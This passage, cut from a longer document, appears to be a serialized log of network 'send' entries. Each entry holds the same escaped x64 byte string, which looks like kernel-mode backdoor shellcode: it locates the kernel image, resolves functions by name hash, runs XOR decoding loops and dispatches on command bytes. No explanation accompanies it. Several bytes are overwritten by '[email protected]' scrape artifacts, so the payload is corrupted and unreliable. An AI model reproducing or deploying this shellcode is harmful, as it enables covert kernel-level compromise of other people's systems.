\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 5, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 6, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA 
H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE 
L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 7, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 
\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\